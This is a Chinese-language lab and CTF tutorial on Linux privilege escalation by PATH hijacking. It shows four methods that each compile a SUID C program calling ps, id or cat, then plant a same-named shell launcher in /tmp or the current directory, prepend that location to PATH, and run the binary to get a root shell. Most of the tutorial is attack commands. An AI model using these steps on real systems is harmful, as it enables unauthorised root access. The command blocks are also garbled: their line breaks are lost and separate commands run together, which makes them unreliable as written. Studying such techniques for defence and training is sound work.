在這篇文章中，我將會為大家介紹一些使用環境變量進行Linux提權的方法，包括在CTF challenges中使用到一些的技術。話不多說，讓我們進入正題！

介紹

PATH是Linux和類Unix操作系統中的環境變量，它指定存儲可執行程序的所有bin和sbin目錄。當用戶在終端上執行任何命令時，它會通過PATH變量來響應用戶執行的命令，并向shell發送請求以搜索可執行文件。超級用戶通常還具有/sbin和/usr/sbin條目，以便于系統管理命令的執行。

使用echo命令顯示當前PATH環境變量：

echo $PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

如果你在PATH變量中看到‘.’，則意味著登錄用戶可以從當前目錄執行二進制文件/腳本，這對于攻擊者而言也是一個提權的絕好機會。這里之所以沒有指定程序的完整路徑，往往是因為編寫程序時的疏忽造成的。

方法1

Ubuntu LAB SET_UP

當前，我們位于/home/raj目錄，我們將在其中創建一個名為/script的新目錄。在script目錄下，我們將編寫一個小型的c程序來調用系統二進制文件的函數。

pwdmkdir scriptcd /scriptnano demo.c

正如你在demo.c文件中看到的，我們正在調用ps命令。

然后使用gcc編譯demo.c文件，并提升編譯文件的SUID權限。

lsgcc demo.c -o shellchmod u+s shellls -la shell

受害者VM機器

假設我們已經成功滲透目標，并進入提權階段。我們通過ssh成功登錄到了受害者的機器。然后使用Find命令，搜索具有SUID或4000權限的文件。

find / -perm -u=s -type f 2>/dev/null

通過上述命令，攻擊者可以枚舉出目標系統上所有的可執行文件，這里可以看到/home/raj/script/shell具有SUID權限。

進入到/home/raj/script目錄，可以看到該目錄下有一個可執行的“shell”文件，我們運行這個文件。

/home/raj/script

Echo命令

cd /tmpecho “/bin/sh” > pschmod 777 psecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shellwhoami

Copy命令

cd /home/raj/script/cp /bin/sh /tmp/psecho $PATHexport PATH=/tmp:$PATH./shellwhoami

Symlink命令

ln -s /bin/sh psexport PATH=.:$PATH./shellidwhoami

注意：符號鏈接也叫軟鏈接，如果目錄具有完全權限，則它將成功運行。在Ubuntu中symlink情況下，我們已經賦予了/script目錄777的權限。

因此，攻擊者可以操縱環境變量PATH來進行提權，并獲得root訪問權限。

方法2

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境，現在在腳本目錄中，我們將編寫一個小型的c程序來調用系統二進制文件的函數。

pwdmkdir scriptcd /scriptnano demo.c

正如你在demo.c文件中看到的，我們正在調用id命令。

然后使用gcc編譯demo.c文件，并提升編譯文件的SUID權限。

lsgcc demo.c -o shell2chmod u+s shell2ls -la shell2

受害者VM機器

同樣，假設我們已經成功滲透目標，并進入提權階段。我們通過ssh成功登錄到了受害者的機器。然后使用Find命令，搜索具有SUID或4000權限的文件。在這里，我們可以看到/home/raj/script/shell2具有SUID權限。

find / -perm -u=s -type f 2>/dev/null

進入到/home/raj/script目錄，可以看到該目錄下有一個可執行的“shell2”文件，我們運行這個文件。

cd /home/raj/scriptls./shell2

Echo命令

cd /tmpecho “/bin/sh” > idchmod 777 idecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shell2whoami

方法3

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境。正如你在demo.c文件中看到的，我們正在調用cat命令從etc/passwd文件中讀取內容。

然后使用gcc編譯demo.c文件，并提升編譯文件的SUID權限。

lsgcc demo.c -o rajchmod u+s rajls -la raj

受害者VM機器

同樣，假設我們已經成功滲透目標，并進入提權階段，通過執行以下命令查看sudo用戶列表。

find / -perm -u=s -type f 2>/dev/null

在這里，我們可以看到/home/raj/script/raj具有SUID權限，進入到home/raj/script/目錄，可以看到該目錄下有一個可執行的“raj”文件。所以當我們運行這個文件時，它會把etc/passwd文件作為輸出結果。

cd /home/raj/script/ls./raj

Nano**編輯器**

cd /tmpnano cat

現在，當終端打開時輸入/bin/bash并保存。

chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./rajwhoami

方法4

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境。正如你在demo.c文件中看到的，我們正在調用cat命令讀取/home/raj中的msg.txt中的內容，但/home/raj中并沒有這樣的文件。

然后使用gcc編譯demo.c文件，并提升編譯文件的SUID權限。

lsgcc demo.c -o ignitechmod u+s ignitels -la ignite

受害者VM機器

同樣，假設我們已經成功滲透目標，并進入提權階段，通過執行以下命令查看sudo用戶列表

find / -perm -u=s -type f 2>/dev/null

在這里，我們可以看到/home/raj/script/ignite具有SUID權限，進入到/home/raj/script目錄，可以看到該目錄下有一個可執行的“ignite”文件。所以當我們運行這個文件時，它會報錯“cat: /home/raj/msg.txt”文件或目錄不存在。

cd /home/raj/scriptls./ignite

Vi編輯器

cd /tmpvi cat

現在，當終端打開時輸入/bin/bash并保存。

chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./ignitewhoami